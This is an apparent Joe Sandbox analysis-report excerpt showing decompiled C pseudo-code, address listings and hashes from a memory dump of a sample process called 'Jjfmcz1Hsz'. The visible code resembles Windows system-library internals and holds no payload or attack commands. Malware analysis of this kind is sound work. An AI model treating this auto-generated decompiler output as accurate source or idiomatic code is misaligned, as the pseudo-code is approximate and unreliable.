                                                                                                                                                                            								_t222 =  *((intOrPtr*)(_t318 - 0x48)) + 0x28;
                                                                                                                                                                            								 *(_t318 - 0x8c) = _t222;
                                                                                                                                                                            								_t291 = _t222;
                                                                                                                                                                            								 *(_t318 - 0x28) = _t291;
                                                                                                                                                                            								 *(_t318 - 0x88) = _t291;
                                                                                                                                                                            								E1D8324D0(_t222);
                                                                                                                                                                            								_t292 = 0;
                                                                                                                                                                            								 *(_t318 - 0x50) = 0;
                                                                                                                                                                            								 *(_t318 - 0x4c) = 0;
                                                                                                                                                                            								 *(_t318 - 0x3c) = 0;
                                                                                                                                                                            								__eflags =  *(_t316 + 0x24);
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									asm("lock bts dword [eax], 0x0");
                                                                                                                                                                            									_t227 = 0;
                                                                                                                                                                            									_t228 = _t227 & 0xffffff00 | __eflags >= 0x00000000;
                                                                                                                                                                            									 *(_t318 - 0x4c) = _t228;
                                                                                                                                                                            									 *(_t318 - 0x3c) = _t228;
                                                                                                                                                                            									__eflags = _t228;
                                                                                                                                                                            									if(_t228 != 0) {
                                                                                                                                                                            										goto L17;
                                                                                                                                                                            									}
                                                                                                                                                                            									__eflags =  *(_t318 + 8) - 1;
                                                                                                                                                                            									if( *(_t318 + 8) == 1) {
                                                                                                                                                                            										L1D832330( *(_t316 + 0x24) + 0x10,  *(_t316 + 0x24) + 0x10);
                                                                                                                                                                            										_t228 = 1;
                                                                                                                                                                            										 *(_t318 - 0x4c) = 1;
                                                                                                                                                                            										 *(_t318 - 0x3c) = 1;
                                                                                                                                                                            										goto L17;
                                                                                                                                                                            									}
                                                                                                                                                                            									_t231 = _t228 + 1;
                                                                                                                                                                            									L35:
                                                                                                                                                                            									 *(_t316 + 0x54) = _t231;
                                                                                                                                                                            									__eflags = _t292;
                                                                                                                                                                            									if(_t292 == 0) {
                                                                                                                                                                            										L1D832330(_t231,  *(_t318 - 0x28));
                                                                                                                                                                            									}
                                                                                                                                                                            									 *((intOrPtr*)(_t316 + 0x5c)) = 0;
                                                                                                                                                                            									goto L37;
                                                                                                                                                                            								}
                                                                                                                                                                            								L17:
                                                                                                                                                                            								__eflags =  *(_t316 + 0x30);
                                                                                                                                                                            								if( *(_t316 + 0x30) != 0) {
                                                                                                                                                                            									L26:
                                                                                                                                                                            									__eflags =  *(_t318 - 0x4c);
                                                                                                                                                                            									if( *(_t318 - 0x4c) != 0) {
                                                                                                                                                                            										_t228 = E1D8324D0( *(_t316 + 0x24) + 0x10);
                                                                                                                                                                            									}
                                                                                                                                                                            									__eflags =  *(_t318 - 0x30);
                                                                                                                                                                            									if( *(_t318 - 0x30) == 0) {
                                                                                                                                                                            										L71:
                                                                                                                                                                            										_t292 =  *(_t318 - 0x50);
                                                                                                                                                                            										L34:
                                                                                                                                                                            										_t231 = 0;
                                                                                                                                                                            										goto L35;
                                                                                                                                                                            									}
                                                                                                                                                                            									L1D832330(_t228,  *(_t318 - 0x8c));
                                                                                                                                                                            									_t292 = 1;
                                                                                                                                                                            									 *(_t318 - 0x50) = 1;
                                                                                                                                                                            									__eflags =  *(_t318 - 0x24) - 0xc000022d;
                                                                                                                                                                            									if( *(_t318 - 0x24) == 0xc000022d) {
                                                                                                                                                                            										L69:
                                                                                                                                                                            										__eflags =  *(_t316 + 0x1c) & 0x00000004;
                                                                                                                                                                            										if(( *(_t316 + 0x1c) & 0x00000004) == 0) {
                                                                                                                                                                            											goto L34;
                                                                                                                                                                            										}
                                                                                                                                                                            										_t269 = 1;
                                                                                                                                                                            										__eflags = 1;
                                                                                                                                                                            										 *(_t318 - 0x64) = 1;
                                                                                                                                                                            										_t187 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x17c04fc
                                                                                                                                                                            										E1D8AC726( *((intOrPtr*)(_t318 - 0x54)),  *(_t318 - 0x24),  *_t187);
                                                                                                                                                                            										goto L71;
                                                                                                                                                                            									}
                                                                                                                                                                            									__eflags =  *(_t318 - 0x24) - 0xc0000017;
                                                                                                                                                                            									if( *(_t318 - 0x24) == 0xc0000017) {
                                                                                                                                                                            										goto L69;
                                                                                                                                                                            									}
                                                                                                                                                                            									__eflags =  *(_t316 + 0x18);
                                                                                                                                                                            									if( *(_t316 + 0x18) != 0) {
                                                                                                                                                                            										_t133 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x17c04fc
                                                                                                                                                                            										__eflags =  *_t133 -  *(_t316 + 0x18);
                                                                                                                                                                            										if( *_t133 -  *(_t316 + 0x18) > 0) {
                                                                                                                                                                            											goto L31;
                                                                                                                                                                            										}
                                                                                                                                                                            										L32:
                                                                                                                                                                            										__eflags =  *(_t316 + 0x1c) & 0x00000004;
                                                                                                                                                                            										if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
                                                                                                                                                                            											__eflags =  *(_t316 + 0x4c);
                                                                                                                                                                            											if( *(_t316 + 0x4c) > 0) {
                                                                                                                                                                            												 *(_t316 + 0x3c) = 0;
                                                                                                                                                                            												 *((intOrPtr*)(_t316 + 0x50)) = 0;
                                                                                                                                                                            												 *((intOrPtr*)(_t316 + 0x44)) = 0;
                                                                                                                                                                            												 *((intOrPtr*)(_t316 + 0x48)) = 0;
                                                                                                                                                                            												 *(_t316 + 0x4c) = 0;
                                                                                                                                                                            												 *((intOrPtr*)(_t316 + 0x58)) = 0;
                                                                                                                                                                            											}
                                                                                                                                                                            										}
                                                                                                                                                                            										goto L34;
                                                                                                                                                                            									}
                                                                                                                                                                            									L31:
                                                                                                                                                                            									_t107 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x17c04fc
                                                                                                                                                                            									 *(_t316 + 0x18) =  *_t107;
                                                                                                                                                                            									goto L32;
                                                                                                                                                                            								}
                                                                                                                                                                            								 *(_t318 - 0x30) = 1;
                                                                                                                                                                            								 *((intOrPtr*)(_t318 - 0x7c)) = 1;
                                                                                                                                                                            								 *((intOrPtr*)(_t318 - 0x6c)) = E1D84F1F0( *((intOrPtr*)(_t318 - 0x6c)));
                                                                                                                                                                            								 *((intOrPtr*)(_t318 - 4)) = 0;
                                                                                                                                                                            								__eflags =  *(_t318 - 0x60);
                                                                                                                                                                            								if( *(_t318 - 0x60) != 0) {
                                                                                                                                                                            									_t255 =  *((intOrPtr*)(_t318 - 0x20));
                                                                                                                                                                            									_t82 = _t255 + 0x14; // 0x17bf900
                                                                                                                                                                            									_t86 = _t255 + 0x10; // 0x17c04fc
                                                                                                                                                                            									 *0x1d9191e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *_t86,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)),  *((intOrPtr*)(_t318 - 0x70)),  *_t82);
                                                                                                                                                                            									 *(_t318 - 0x24) =  *((intOrPtr*)(_t318 - 0x2c))();
                                                                                                                                                                            								}
                                                                                                                                                                            								_t244 =  *(_t318 - 0x38);
                                                                                                                                                                            								__eflags = _t244 & 0x00000010;
                                                                                                                                                                            								if((_t244 & 0x00000010) != 0) {
                                                                                                                                                                            									__eflags =  *(_t316 + 0x30);
                                                                                                                                                                            									if( *(_t316 + 0x30) != 0) {
                                                                                                                                                                            										goto L21;
                                                                                                                                                                            									}
                                                                                                                                                                            									__eflags =  *(_t318 - 0x24);
                                                                                                                                                                            									if( *(_t318 - 0x24) >= 0) {
                                                                                                                                                                            										L64:
                                                                                                                                                                            										 *0x1d9191e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)), 0,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)), 0, 0);
                                                                                                                                                                            										 *((intOrPtr*)(_t318 - 0x2c))();
                                                                                                                                                                            										 *(_t318 - 0x24) = 0;
                                                                                                                                                                            										_t244 =  *(_t318 - 0x38);
                                                                                                                                                                            										goto L21;
                                                                                                                                                                            									}
                                                                                                                                                                            									__eflags =  *(_t316 + 0x1c) & 0x00000004;
                                                                                                                                                                            									if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
                                                                                                                                                                            										goto L21;
                                                                                                                                                                            									}
                                                                                                                                                                            									goto L64;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									L21:
                                                                                                                                                                            									__eflags = _t244 & 0xffffffee;
                                                                                                                                                                            									if((_t244 & 0xffffffee) != 0) {
                                                                                                                                                                            										 *(_t318 - 0x24) = 0;
                                                                                                                                                                            										 *0x1d9191e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *((intOrPtr*)(_t318 - 0x34)), _t244);
                                                                                                                                                                            										 *((intOrPtr*)(_t318 - 0x2c))();
                                                                                                                                                                            									}
                                                                                                                                                                            									_t247 = E1D833C40();
                                                                                                                                                                            									__eflags = _t247;
                                                                                                                                                                            									if(_t247 != 0) {
                                                                                                                                                                            										_t250 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										_t250 = 0x7ffe038e;
                                                                                                                                                                            									}
                                                                                                                                                                            									__eflags =  *_t250;
                                                                                                                                                                            									if( *_t250 != 0) {
                                                                                                                                                                            										_t175 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x17c04fc
                                                                                                                                                                            										_t250 = E1D8AC490( *_t175,  *((intOrPtr*)(_t318 - 0x54)),  *((intOrPtr*)(_t318 - 0x48)),  *((intOrPtr*)(_t318 - 0x2c)),  *(_t318 - 0x38),  *(_t318 - 0x24),  *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)));
                                                                                                                                                                            									}
                                                                                                                                                                            									 *((intOrPtr*)(_t318 - 4)) = 0xfffffffe;
                                                                                                                                                                            									E1D84F1DB(_t250);
                                                                                                                                                                            									_t228 = E1D84F1F0( *((intOrPtr*)(_t318 - 0x6c)));
                                                                                                                                                                            									goto L26;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _t284 & 0x00000010;
                                                                                                                                                                            						if((_t284 & 0x00000010) == 0) {
                                                                                                                                                                            							goto L37;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L14;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags =  *(_t316 + 0x18);
                                                                                                                                                                            					if( *(_t316 + 0x18) != 0) {
                                                                                                                                                                            						_t120 = _t209 + 0x10; // 0x17c04fc
                                                                                                                                                                            						__eflags =  *_t120 -  *(_t316 + 0x18);
                                                                                                                                                                            						if( *_t120 -  *(_t316 + 0x18) > 0) {
                                                                                                                                                                            							goto L14;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L40;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L14;
                                                                                                                                                                            				}
                                                                                                                                                                            			}
































                                                                                                                                                                            0x1d84ee48
                                                                                                                                                                            0x1d84ee4a
                                                                                                                                                                            0x1d84ee4f
                                                                                                                                                                            0x1d84ee54
                                                                                                                                                                            0x1d84ee56
                                                                                                                                                                            0x1d84ee5b
                                                                                                                                                                            0x1d84ee60
                                                                                                                                                                            0x1d84ee63
                                                                                                                                                                            0x1d84ee66
                                                                                                                                                                            0x1d84ee68
                                                                                                                                                                            0x1d84ee70
                                                                                                                                                                            0x1d84ee73
                                                                                                                                                                            0x1d84ee76
                                                                                                                                                                            0x1d84ee79
                                                                                                                                                                            0x1d84ee80
                                                                                                                                                                            0x1d84ee85
                                                                                                                                                                            0x1d84ee88
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84ee8b
                                                                                                                                                                            0x1d84ee93
                                                                                                                                                                            0x1d84ee98
                                                                                                                                                                            0x1d84ee9f
                                                                                                                                                                            0x1d84eeac
                                                                                                                                                                            0x1d84eeb8
                                                                                                                                                                            0x1d84eeb8
                                                                                                                                                                            0x1d84eebe
                                                                                                                                                                            0x1d84eec6
                                                                                                                                                                            0x1d84eec9
                                                                                                                                                                            0x1d84eec9
                                                                                                                                                                            0x1d84eece
                                                                                                                                                                            0x1d84eece
                                                                                                                                                                            0x1d84eece
                                                                                                                                                                            0x1d84eece
                                                                                                                                                                            0x1d84eece
                                                                                                                                                                            0x1d84eece
                                                                                                                                                                            0x1d84eed3
                                                                                                                                                                            0x1d84eed6
                                                                                                                                                                            0x1d84eedb
                                                                                                                                                                            0x1d84eee0
                                                                                                                                                                            0x1d84eee6
                                                                                                                                                                            0x1d84eeee
                                                                                                                                                                            0x1d84eeee
                                                                                                                                                                            0x1d84eef0
                                                                                                                                                                            0x1d84eef4
                                                                                                                                                                            0x1d84eef6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84f1dc
                                                                                                                                                                            0x1d84f1dc
                                                                                                                                                                            0x1d84eefc
                                                                                                                                                                            0x1d84eefc
                                                                                                                                                                            0x1d84ef01
                                                                                                                                                                            0x1d84ef03
                                                                                                                                                                            0x1d84ef06
                                                                                                                                                                            0x1d84ef09
                                                                                                                                                                            0x1d84ef0c
                                                                                                                                                                            0x1d84ef0f
                                                                                                                                                                            0x1d84ef0f
                                                                                                                                                                            0x1d84ef16
                                                                                                                                                                            0x1d84ef16
                                                                                                                                                                            0x1d84ef1b
                                                                                                                                                                            0x1d84ef20
                                                                                                                                                                            0x1d84ef26
                                                                                                                                                                            0x1d84ef29
                                                                                                                                                                            0x1d84ef2c
                                                                                                                                                                            0x1d84ef2c
                                                                                                                                                                            0x1d84ef36
                                                                                                                                                                            0x1d84ef36
                                                                                                                                                                            0x1d84ef3b
                                                                                                                                                                            0x1d84ef40
                                                                                                                                                                            0x1d84ef46
                                                                                                                                                                            0x1d84ef4c
                                                                                                                                                                            0x1d84ef54
                                                                                                                                                                            0x1d84ef57
                                                                                                                                                                            0x1d84ef59
                                                                                                                                                                            0x1d84ef60
                                                                                                                                                                            0x1d84ef63
                                                                                                                                                                            0x1d84ef63
                                                                                                                                                                            0x1d84ef66
                                                                                                                                                                            0x1d84ef69
                                                                                                                                                                            0x1d84ef6c
                                                                                                                                                                            0x1d84f113
                                                                                                                                                                            0x1d84f113
                                                                                                                                                                            0x1d84f115
                                                                                                                                                                            0x1d84f122
                                                                                                                                                                            0x1d84f127
                                                                                                                                                                            0x1d84f12b
                                                                                                                                                                            0x1d88fe64
                                                                                                                                                                            0x1d88fe6a
                                                                                                                                                                            0x1d88fe6a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84f12b
                                                                                                                                                                            0x1d84ef72
                                                                                                                                                                            0x1d84ef74
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84ef7a
                                                                                                                                                                            0x1d84ef7d
                                                                                                                                                                            0x1d84ef7d
                                                                                                                                                                            0x1d84ef7d
                                                                                                                                                                            0x1d84ef81
                                                                                                                                                                            0x1d84f144
                                                                                                                                                                            0x1d84f144
                                                                                                                                                                            0x1d84f14a
                                                                                                                                                                            0x1d88fd20
                                                                                                                                                                            0x1d88fd23
                                                                                                                                                                            0x1d84ef90
                                                                                                                                                                            0x1d84ef90
                                                                                                                                                                            0x1d84ef93
                                                                                                                                                                            0x1d88fd2e
                                                                                                                                                                            0x1d88fd31
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88fd37
                                                                                                                                                                            0x1d88fd45
                                                                                                                                                                            0x1d88fd4b
                                                                                                                                                                            0x1d88fd4b
                                                                                                                                                                            0x1d88fd4e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88fd54
                                                                                                                                                                            0x1d88fd3c
                                                                                                                                                                            0x1d88fd3f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88fd3f
                                                                                                                                                                            0x1d84ef99
                                                                                                                                                                            0x1d84ef99
                                                                                                                                                                            0x1d84ef9c
                                                                                                                                                                            0x1d84f1a6
                                                                                                                                                                            0x1d84f1a9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84f1af
                                                                                                                                                                            0x1d84efa2
                                                                                                                                                                            0x1d84efa2
                                                                                                                                                                            0x1d84efa5
                                                                                                                                                                            0x1d84efab
                                                                                                                                                                            0x1d84efae
                                                                                                                                                                            0x1d84efb4
                                                                                                                                                                            0x1d84efba
                                                                                                                                                                            0x1d84efc0
                                                                                                                                                                            0x1d84efc6
                                                                                                                                                                            0x1d84efcc
                                                                                                                                                                            0x1d84efd8
                                                                                                                                                                            0x1d84efde
                                                                                                                                                                            0x1d84efe1
                                                                                                                                                                            0x1d84efe7
                                                                                                                                                                            0x1d84efe9
                                                                                                                                                                            0x1d84efec
                                                                                                                                                                            0x1d84eff3
                                                                                                                                                                            0x1d84eff8
                                                                                                                                                                            0x1d84effa
                                                                                                                                                                            0x1d84efff
                                                                                                                                                                            0x1d84f002
                                                                                                                                                                            0x1d84f008
                                                                                                                                                                            0x1d84f00a
                                                                                                                                                                            0x1d84f15d
                                                                                                                                                                            0x1d84f164
                                                                                                                                                                            0x1d84f165
                                                                                                                                                                            0x1d84f168
                                                                                                                                                                            0x1d84f16b
                                                                                                                                                                            0x1d84f16e
                                                                                                                                                                            0x1d84f170
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84f176
                                                                                                                                                                            0x1d84f17a
                                                                                                                                                                            0x1d84f1c8
                                                                                                                                                                            0x1d84f1cf
                                                                                                                                                                            0x1d84f1d0
                                                                                                                                                                            0x1d84f1d3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84f1d3
                                                                                                                                                                            0x1d84f17c
                                                                                                                                                                            0x1d84f105
                                                                                                                                                                            0x1d84f105
                                                                                                                                                                            0x1d84f108
                                                                                                                                                                            0x1d84f10a
                                                                                                                                                                            0x1d84f1b7
                                                                                                                                                                            0x1d84f1b7
                                                                                                                                                                            0x1d84f110
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84f110
                                                                                                                                                                            0x1d84f010
                                                                                                                                                                            0x1d84f010
                                                                                                                                                                            0x1d84f013
                                                                                                                                                                            0x1d84f0a2
                                                                                                                                                                            0x1d84f0a2
                                                                                                                                                                            0x1d84f0a6
                                                                                                                                                                            0x1d84f186
                                                                                                                                                                            0x1d84f186
                                                                                                                                                                            0x1d84f0ac
                                                                                                                                                                            0x1d84f0b0
                                                                                                                                                                            0x1d88fe56
                                                                                                                                                                            0x1d88fe56
                                                                                                                                                                            0x1d84f103
                                                                                                                                                                            0x1d84f103
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84f103
                                                                                                                                                                            0x1d84f0bc
                                                                                                                                                                            0x1d84f0c3
                                                                                                                                                                            0x1d84f0c4
                                                                                                                                                                            0x1d84f0c7
                                                                                                                                                                            0x1d84f0ce
                                                                                                                                                                            0x1d88fe35
                                                                                                                                                                            0x1d88fe35
                                                                                                                                                                            0x1d88fe39
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88fe41
                                                                                                                                                                            0x1d88fe41
                                                                                                                                                                            0x1d88fe42
                                                                                                                                                                            0x1d88fe48
                                                                                                                                                                            0x1d88fe51
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88fe51
                                                                                                                                                                            0x1d84f0d4
                                                                                                                                                                            0x1d84f0db
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84f0e1
                                                                                                                                                                            0x1d84f0e5
                                                                                                                                                                            0x1d84f193
                                                                                                                                                                            0x1d84f199
                                                                                                                                                                            0x1d84f19b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84f0f4
                                                                                                                                                                            0x1d84f0f4
                                                                                                                                                                            0x1d84f0f8
                                                                                                                                                                            0x1d84f0fa
                                                                                                                                                                            0x1d84f0fd
                                                                                                                                                                            0x1d88fe1e
                                                                                                                                                                            0x1d88fe21
                                                                                                                                                                            0x1d88fe24
                                                                                                                                                                            0x1d88fe27
                                                                                                                                                                            0x1d88fe2a
                                                                                                                                                                            0x1d88fe2d
                                                                                                                                                                            0x1d88fe2d
                                                                                                                                                                            0x1d84f0fd
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84f0f8
                                                                                                                                                                            0x1d84f0eb
                                                                                                                                                                            0x1d84f0ee
                                                                                                                                                                            0x1d84f0f1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84f0f1
                                                                                                                                                                            0x1d84f01c
                                                                                                                                                                            0x1d84f01f
                                                                                                                                                                            0x1d84f02a
                                                                                                                                                                            0x1d84f02d
                                                                                                                                                                            0x1d84f030
                                                                                                                                                                            0x1d84f034
                                                                                                                                                                            0x1d84f036
                                                                                                                                                                            0x1d84f039
                                                                                                                                                                            0x1d84f045
                                                                                                                                                                            0x1d84f051
                                                                                                                                                                            0x1d84f05a
                                                                                                                                                                            0x1d84f05a
                                                                                                                                                                            0x1d84f05d
                                                                                                                                                                            0x1d84f060
                                                                                                                                                                            0x1d84f062
                                                                                                                                                                            0x1d88fd59
                                                                                                                                                                            0x1d88fd5c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88fd62
                                                                                                                                                                            0x1d88fd66
                                                                                                                                                                            0x1d88fd72
                                                                                                                                                                            0x1d88fd84
                                                                                                                                                                            0x1d88fd8a
                                                                                                                                                                            0x1d88fd8d
                                                                                                                                                                            0x1d88fd90
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88fd90
                                                                                                                                                                            0x1d88fd68
                                                                                                                                                                            0x1d88fd6c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84f068
                                                                                                                                                                            0x1d84f068
                                                                                                                                                                            0x1d84f068
                                                                                                                                                                            0x1d84f06d
                                                                                                                                                                            0x1d88fd98
                                                                                                                                                                            0x1d88fda8
                                                                                                                                                                            0x1d88fdae
                                                                                                                                                                            0x1d88fdae
                                                                                                                                                                            0x1d84f073
                                                                                                                                                                            0x1d84f078
                                                                                                                                                                            0x1d84f07a
                                                                                                                                                                            0x1d88fdbf
                                                                                                                                                                            0x1d84f080
                                                                                                                                                                            0x1d84f080
                                                                                                                                                                            0x1d84f080
                                                                                                                                                                            0x1d84f085
                                                                                                                                                                            0x1d84f088
                                                                                                                                                                            0x1d88fde1
                                                                                                                                                                            0x1d88fde4
                                                                                                                                                                            0x1d88fde4
                                                                                                                                                                            0x1d84f08e
                                                                                                                                                                            0x1d84f095
                                                                                                                                                                            0x1d84f09d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84f09d
                                                                                                                                                                            0x1d84f062
                                                                                                                                                                            0x1d88fd29
                                                                                                                                                                            0x1d84f150
                                                                                                                                                                            0x1d84f153
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84f155
                                                                                                                                                                            0x1d84ef87
                                                                                                                                                                            0x1d84ef8a
                                                                                                                                                                            0x1d84f136
                                                                                                                                                                            0x1d84f13c
                                                                                                                                                                            0x1d84f13e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84f13e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84ef8a

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 62dcf3f8eef838b2c47180af85e20142eddb4b15872975fe6f4cce704eac110f
                                                                                                                                                                            • Instruction ID: 8bda08165d2daa683f3c946cf48a6b68032b913ef2223c97d13473b87dd783e7
                                                                                                                                                                            • Opcode Fuzzy Hash: 62dcf3f8eef838b2c47180af85e20142eddb4b15872975fe6f4cce704eac110f
                                                                                                                                                                            • Instruction Fuzzy Hash: CAE10076D04248DFCB26CFA9C984A9DBBF1FF48310F20856EE55AA7261D730A840CF52
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                            			E1D8258E0(signed int __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
                                                                                                                                                                            				void* _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				char _v20;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				char _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				char _v56;
                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                            				intOrPtr _v76;
                                                                                                                                                                            				intOrPtr _v80;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				char _v96;
                                                                                                                                                                            				intOrPtr _v144;
                                                                                                                                                                            				signed int _v160;
                                                                                                                                                                            				signed int _v164;
                                                                                                                                                                            				intOrPtr _v168;
                                                                                                                                                                            				signed char _v176;
                                                                                                                                                                            				intOrPtr _v180;
                                                                                                                                                                            				char _v216;
                                                                                                                                                                            				intOrPtr _v220;
                                                                                                                                                                            				signed int _v228;
                                                                                                                                                                            				intOrPtr* _v240;
                                                                                                                                                                            				char _v244;
                                                                                                                                                                            				char _v245;
                                                                                                                                                                            				char _v246;
                                                                                                                                                                            				char _v247;
                                                                                                                                                                            				char _v248;
                                                                                                                                                                            				char _v249;
                                                                                                                                                                            				char _v250;
                                                                                                                                                                            				char _v251;
                                                                                                                                                                            				char _v252;
                                                                                                                                                                            				char _v253;
                                                                                                                                                                            				signed int _v260;
                                                                                                                                                                            				char _v261;
                                                                                                                                                                            				signed int _v268;
                                                                                                                                                                            				signed int _v272;
                                                                                                                                                                            				signed int _v276;
                                                                                                                                                                            				signed int _v280;
                                                                                                                                                                            				signed int _v288;
                                                                                                                                                                            				signed int _v292;
                                                                                                                                                                            				char _v300;
                                                                                                                                                                            				void* _v304;
                                                                                                                                                                            				signed int _v308;
                                                                                                                                                                            				char _v312;
                                                                                                                                                                            				signed int _v316;
                                                                                                                                                                            				signed int _v320;
                                                                                                                                                                            				signed int _v324;
                                                                                                                                                                            				signed int _v328;
                                                                                                                                                                            				char _v352;
                                                                                                                                                                            				signed int* _v356;
                                                                                                                                                                            				signed int _v360;
                                                                                                                                                                            				signed int _v364;
                                                                                                                                                                            				signed int _v380;
                                                                                                                                                                            				intOrPtr _v388;
                                                                                                                                                                            				signed int _v392;
                                                                                                                                                                            				intOrPtr _v396;
                                                                                                                                                                            				signed int _v400;
                                                                                                                                                                            				signed int _v404;
                                                                                                                                                                            				signed int _v408;
                                                                                                                                                                            				signed int _t235;
                                                                                                                                                                            				signed int _t236;
                                                                                                                                                                            				intOrPtr* _t242;
                                                                                                                                                                            				intOrPtr _t250;
                                                                                                                                                                            				char _t253;
                                                                                                                                                                            				char _t254;
                                                                                                                                                                            				intOrPtr _t257;
                                                                                                                                                                            				signed int _t261;
                                                                                                                                                                            				intOrPtr _t262;
                                                                                                                                                                            				char _t268;
                                                                                                                                                                            				void* _t273;
                                                                                                                                                                            				signed int* _t282;
                                                                                                                                                                            				intOrPtr _t288;
                                                                                                                                                                            				signed int* _t292;
                                                                                                                                                                            				signed int _t293;
                                                                                                                                                                            				signed int _t297;
                                                                                                                                                                            				char _t298;
                                                                                                                                                                            				intOrPtr _t309;
                                                                                                                                                                            				signed int _t316;
                                                                                                                                                                            				char _t317;
                                                                                                                                                                            				signed int _t322;
                                                                                                                                                                            				signed int _t323;
                                                                                                                                                                            				char _t332;
                                                                                                                                                                            				intOrPtr _t339;
                                                                                                                                                                            				intOrPtr _t340;
                                                                                                                                                                            				intOrPtr* _t342;
                                                                                                                                                                            				signed int _t343;
                                                                                                                                                                            				signed int _t356;
                                                                                                                                                                            				signed int _t359;
                                                                                                                                                                            				signed int _t360;
                                                                                                                                                                            				signed int _t361;
                                                                                                                                                                            				signed int _t366;
                                                                                                                                                                            				intOrPtr* _t368;
                                                                                                                                                                            				char* _t375;
                                                                                                                                                                            				signed int _t377;
                                                                                                                                                                            				signed int _t380;
                                                                                                                                                                            				intOrPtr* _t384;
                                                                                                                                                                            				signed int _t387;
                                                                                                                                                                            				intOrPtr _t388;
                                                                                                                                                                            				void* _t389;
                                                                                                                                                                            				void* _t390;
                                                                                                                                                                            
                                                                                                                                                                            				_t390 = __eflags;
                                                                                                                                                                            				_t379 = __esi;
                                                                                                                                                                            				_t341 = __ebx;
                                                                                                                                                                            				_push(0xfffffffe);
                                                                                                                                                                            				_push(0x1d8fbd28);
                                                                                                                                                                            				_push(E1D86AD20);
                                                                                                                                                                            				_push( *[fs:0x0]);
                                                                                                                                                                            				_t388 = _t387 - 0x184;
